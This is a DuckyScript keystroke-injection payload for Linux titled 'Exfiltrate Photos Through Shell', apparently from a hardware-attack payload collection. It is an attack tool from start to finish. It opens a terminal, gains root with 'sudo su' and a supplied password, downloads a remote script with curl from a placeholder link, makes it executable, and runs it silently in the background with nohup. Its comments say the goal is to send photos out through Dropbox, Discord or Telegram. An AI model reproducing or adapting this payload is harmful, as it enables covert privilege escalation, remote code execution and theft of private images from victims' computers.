1

2
REM ##################################################
3
REM #                                                |
4
REM # Title        : Exfiltrate Photos Through Shell |
5
REM # Author       : Aleff                           |
6
REM # Version      : 1.0                             |
7
REM # Category     : Exfiltration                    |
8
REM # Target       : Linux                           |
9
REM #                                                |
10
REM ##################################################
11

12
REM Requirements:
13
REM     - Internet Connection
14
REM     - Dropbox Token for example, but you can use whatever you want for the exfiltration (i.e. smtp e-mail, Discord, Telegram and so on..)
15
REM     - sudo permissions
16
REM         - if you need to install 'fswebcam'
17
REM         - for add the -x permission to the script.sh downloaded
18

19
REM REQUIRED - replace example.com with your script.sh link
20
DEFINE SCRIPT-SH-LINK example.com
21

22
REM REQUIRED - sudo Password
23
DEFINE SUDO-PSWD example
24

25
DELAY 1000
26
CTRL-ALT t
27
DELAY 2000
28

29

30
REM #### Permission ####
31

32
REM This section of sudo time depends by the computer power on which it runs.
33
REM So if you know that the computer on which you run the payload is too slow, increase it by a few seconds, otherwise you can try running it as it is set now or smaller depending on your needs.
34

35
STRING sudo su
36
ENTER
37
DELAY 500
38
STRING SUDO-PSWD
39
ENTER
40
REM DELAY Based On Computer Power
41
DELAY 5000
42

43
REM If you want to install the dependency of fswebcam you should decommend it.
44
REM STRING apt install fswebcam -y
45
REM ENTER
46
REM DELAY Based On Internet Power
47
REM DELAY 5000
48

49

50
REM #### Script ####
51

52

53
STRING curl 
54
STRING SCRIPT-SH-LINK
55
STRING  > script.sh
56
ENTER
57
REM DELAY Based On Internet Power
58
DELAY 4000
59

60
STRING chmod +x script.sh
61
ENTER
62
DELAY 500
63

64
STRING nohup ./script.sh > /dev/null 2>&1 & exit
65
ENTER
66

67